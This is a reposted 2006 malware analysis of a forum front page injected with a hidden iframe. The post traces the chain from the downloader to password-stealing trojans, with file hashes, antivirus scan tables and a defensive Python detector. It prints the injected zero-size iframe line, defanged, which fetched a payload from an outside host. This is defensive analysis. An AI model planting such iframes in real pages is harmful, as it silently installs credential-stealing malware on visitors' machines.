A forum page was injected with code that downloads Trojan-Downloader.Win32.Delf.ajm

Source: Internet  Posted: database requirements analysis  Editor: Programming Blog Net  Time: 2024/04/29 05:07

endurer, original write-up
2006-12-15, 1st

The forum front page was injected with the following code:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/


The content of wm.htm is a JavaScript script. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file /mc/game/lpf.exe, save it as c:/boot.exe, and then run it through the ShellExecute method of the Shell.Application object.
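As an added defender-side example (not code from the original post), the following Python checks a fetched page for the two signs described above: an iframe sized to be invisible, and a script that instantiates the Microsoft.XMLHTTP / Scripting.FileSystemObject / Shell.Application chain. The sample page and script are constructed here, and the domain is a placeholder, not the real site.

```python
import re

# Constructed sample page, modeled on the injection described in this post.
# The domain is a placeholder, not the actual compromised site.
SAMPLE_FORUM_PAGE = """<html><body>
<p>Welcome to the forum</p>
<iframe src=hxxp://www.example-placeholder.invalid/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
</body></html>"""

# Constructed stand-in for wm.htm: only the object instantiations, no payload logic.
SAMPLE_WM_HTM = """<script language="JavaScript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
var f = new ActiveXObject("Scripting.FileSystemObject");
var s = new ActiveXObject("Shell.Application");
</script>"""

# COM objects the post names as the download -> save -> execute chain.
SUSPICIOUS_OBJECTS = {
    "microsoft.xmlhttp": "HTTP download",
    "scripting.filesystemobject": "write file to disk",
    "shell.application": "execute downloaded file",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"?([^\s">]+)"?')
ACTIVEX_RE = re.compile(r'ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.IGNORECASE)


def find_hidden_iframes(html):
    """Return the src of every iframe whose width and height are both 0."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(m.group(1))}
        if attrs.get("width") == "0" and attrs.get("height") == "0":
            hits.append(attrs.get("src", ""))
    return hits


def find_dropper_objects(script):
    """Return the suspicious COM objects instantiated, in order, without duplicates."""
    seen = []
    for name in ACTIVEX_RE.findall(script):
        key = name.lower()
        if key in SUSPICIOUS_OBJECTS and key not in seen:
            seen.append(key)
    return seen


def is_download_execute_chain(script):
    """True only when download, file-write and execute objects all appear together."""
    return set(find_dropper_objects(script)) == set(SUSPICIOUS_OBJECTS)
```

A single Microsoft.XMLHTTP instance is common in legitimate pages, so the chain check requires all three objects before flagging.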

lpf.exe was built with a Borland Delphi Setup Module
/-------
File : D:/virus/lpf.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 20:52:52
Modified : 2006-12-15 20:52:54
Accessed : 2006-12-15 0:0:0
Size : 15872 bytes 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky reports it as Trojan-Downloader.Win32.Delf.ajm; Rising (瑞星) reports it as Trojan.DL.Multi.wen


Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

Antivirus  Version  Update  Result
AntiVir  7.3.0.15  12.15.2006  TR/Delphi.Downloader.Gen
Authentium  4.93.8  12.14.2006  Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Avast  4.7.892.0  12.15.2006  no virus found
AVG  386  12.15.2006  no virus found
BitDefender  7.2  12.15.2006  BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal  8.00  12.14.2006  TrojanDownloader.Delf.ajm
ClamAV  devel-20060426  12.15.2006  Trojan.Downloader-51
DrWeb  4.33  12.15.2006  Trojan.DownLoader.14624
eSafe  7.0.14.0  12.14.2006  no virus found
eTrust-InoculateIT  23.73.86  12.15.2006  no virus found
eTrust-Vet  30.3.3252  12.15.2006  no virus found
Ewido  4.0  12.15.2006  Downloader.Delf.ajm
Fortinet  2.82.0.0  12.15.2006  no virus found
F-Prot  3.16f  12.14.2006  Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
F-Prot4  4.2.1.29  12.14.2006  W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Ikarus  T3.1.0.26  12.15.2006  no virus found
Kaspersky  4.0.2.24  12.15.2006  Trojan-Downloader.Win32.Delf.ajm
McAfee  4919  12.14.2006  Generic Delphi
Microsoft  1.1804  12.15.2006  no virus found
NOD32v2  1923  12.15.2006  probably a variant of Win32/TrojanDownloader.Delf.NDQ
Norman  5.80.02  12.15.2006  W32/Delf.TWZ
Panda  9.0.0.4  12.15.2006  Suspicious file
Prevx1  V2  12.15.2006  no virus found
Sophos  4.12.0  12.14.2006  no virus found
Sunbelt  2.2.907.0  11.30.2006  no virus found
TheHacker  6.0.3.132  12.14.2006  no virus found
UNA  1.83  12.14.2006  no virus found
VBA32  3.11.1  12.14.2006  no virus found
VirusBuster  4.3.19:9  12.14.2006  no virus found

Additional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe downloads the following files:
1)/mc/bao/lipengfei.exe

Packed with UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
/-------
File : D:/virus/lipengfei.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 21:2:56
Modified : 2006-12-15 21:2:58
Accessed : 2006-12-15 0:0:0
Size : 39069 bytes 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
Rising (瑞星) reports it as: Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

Antivirus  Version  Update  Result
AntiVir  7.3.0.15  12.15.2006  DR/Delphi.Gen
Authentium  4.93.8  12.14.2006  no virus found
Avast  4.7.892.0  12.15.2006  Win32:QQPass-EU
AVG  386  12.15.2006  PSW.Generic2.SUE
BitDefender  7.2  12.15.2006  Generic.PWStealer.A771A4B9
CAT-QuickHeal  8.00  12.14.2006  no virus found
ClamAV  devel-20060426  12.15.2006  no virus found
DrWeb  4.33  12.15.2006  Trojan.PWS.Qqpass.326
eSafe  7.0.14.0  12.14.2006  suspicious Trojan/Worm
eTrust-InoculateIT  23.73.86  12.15.2006  Win32/QQPass.Variant!Trojan
eTrust-Vet  30.3.3252  12.15.2006  no virus found
Ewido  4.0  12.15.2006  Trojan.QQPass.ra
Fortinet  2.82.0.0  12.15.2006  no virus found
F-Prot  3.16f  12.14.2006  no virus found
F-Prot4  4.2.1.29  12.14.2006  no virus found
Ikarus  T3.1.0.26  12.15.2006  Trojan-PSW.Win32.Delf.IC
Kaspersky  4.0.2.24  12.15.2006  Trojan-PSW.Win32.QQPass.ra
McAfee  4919  12.14.2006  PWS-Hook.dll
Microsoft  1.1804  12.15.2006  no virus found
NOD32v2  1923  12.15.2006  probably a variant of Win32/PSW.QQShou.EP
Norman  5.80.02  12.15.2006  W32/QQPass.CHM
Panda  9.0.0.4  12.15.2006  Suspicious file
Prevx1  V2  12.15.2006  no virus found
Sophos  4.12.0  12.14.2006  no virus found
Sunbelt  2.2.907.0  11.30.2006  no virus found
TheHacker  6.0.3.132  12.14.2006  Trojan/PSW.QQPass.ra
UNA  1.83  12.14.2006  Trojan.PSW.Win32.QQPass.6EDE
VBA32  3.11.1  12.14.2006  BackDoor.Pigeon.516
VirusBuster  4.3.19:9  12.14.2006  no virus found

Additional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2)/mc/pqpq.exe
Packed with nSPack 1.3 -> North Star/Liu Xing Ping
/-------
File : D:/pe/virus/pqpq.exe
Attributes : A---
Language : Chinese (China)
File version : 0.00.0195
Description :
Copyright :
Comments :
Product version : 0.00.0195
Product name : Xcd
Company name : Xcd
Legal trademarks :
Internal name : 23oigj
Original filename : 23oigj.exe
Created : 2006-12-15 21:3:12
Modified : 2006-12-15 21:3:14
Accessed : 2006-12-15 0:0:0
Size : 44151 bytes 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
Rising (瑞星) reports it as: Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

Antivirus  Version  Update  Result
AntiVir  7.3.0.15  12.15.2006  TR/PSW.Lmir.44151
Authentium  4.93.8  12.14.2006  Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
Avast  4.7.892.0  12.15.2006  no virus found
AVG  386  12.15.2006  no virus found
BitDefender  7.2  12.15.2006  Generic.PWSLmir.D80E5DAD
CAT-QuickHeal  8.00  12.14.2006  (Suspicious) - DNAScan
ClamAV  devel-20060426  12.15.2006  no virus found
DrWeb  4.33  12.15.2006  BackDoor.Generic.1482
eSafe  7.0.14.0  12.14.2006  suspicious Trojan/Worm
eTrust-InoculateIT  23.73.86  12.15.2006  no virus found
eTrust-Vet  30.3.3252  12.15.2006  no virus found
Ewido  4.0  12.15.2006  no virus found
Fortinet  2.82.0.0  12.15.2006  Spy/WOWSTEAL
F-Prot  3.16f  12.14.2006  Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
F-Prot4  4.2.1.29  12.14.2006  W32/Suspicious:VisualBasicMalware!Maximus
Ikarus  T3.1.0.26  12.15.2006  Backdoor.Win32.PcClient.GV
Kaspersky  4.0.2.24  12.15.2006  no virus found
McAfee  4919  12.14.2006  no virus found
Microsoft  1.1804  12.15.2006  PWS:Win32/Wowsteal.gen!A
NOD32v2  1923  12.15.2006  a variant of Win32/PSW.Legendmir
Norman  5.80.02  12.15.2006  no virus found
Panda  9.0.0.4  12.15.2006  Suspicious file
Prevx1  V2  12.15.2006  Trojan.SystemPoser
Sophos  4.12.0  12.14.2006  Mal/PWS-D
Sunbelt  2.2.907.0  11.30.2006  VIPRE.Suspicious
TheHacker  6.0.3.132  12.14.2006  no virus found
UNA  1.83  12.14.2006  no virus found
VBA32  3.11.1  12.14.2006  BackDoor.Generic.1482
VirusBuster  4.3.19:9  12.14.2006  novirus:Packed/NSPack

Additional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3)/mc/gezi.exe  could not be retrieved
4)/mc/dabao.exe could not be retrieved
5)/mc/xbao.exe  could not be retrieved

They are saved under C:/Program Files/Common Files as:
1.exe
2.exe
3.exe
4.exe
5.exe

This is very similar to the case found earlier, but the MD5 hashes of the files differ.